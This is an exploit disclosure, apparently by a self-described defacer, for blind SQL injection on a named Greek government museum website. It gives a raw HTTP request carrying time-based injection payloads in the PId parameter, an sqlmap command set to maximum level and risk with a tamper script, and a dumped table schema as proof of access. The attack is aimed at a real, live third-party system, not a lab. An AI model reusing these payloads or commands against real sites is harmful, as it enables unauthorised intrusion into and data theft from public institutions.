################################################################### # Exploit Title : larmouseia.thessaly.gov.gr blind sql inj vuln # Author [ Discovered By ] : At0m - Turkish Defacer and Bug Resarcher # Tested On : Windows and Linux # file.txt : GET /foto_mouseio.php?PId=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/ HTTP/1.1 X-Requested-With: XMLHttpRequest Referer: http://larmouseia.thessaly.gov.gr/ Cookie: PHPSESSID=374941e7f62501d7ae853771458e0d2f Host: larmouseia.thessaly.gov.gr Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* #command: python sqlmap.py -r file.txt --level=5 --risk=3 --tamper=space2comment --dbs --batch # Contact / skype : at0munderground@gmail.com Database: MouseiaLar Table: Mouseio [16 columns] +------------+--------------+ | Column | Type | +------------+--------------+ | HistoryEl | varchar(255) | | HistoryEn | varchar(255) | | IconEl | varchar(255) | | IconEn | varchar(255) | | InfoEl | text | | InfoEn | text | | LocEl | text | | LocEn | text | | MapEl | varchar(255) | | MapEn | varchar(255) | | Mouseio_Id | int(11) | | NameEl | varchar(255) | | NameEn | varchar(255) | | OrderBy | tinyint(4) | | PresEl | text | | PresEn | text | +------------+--------------+ ###################################################################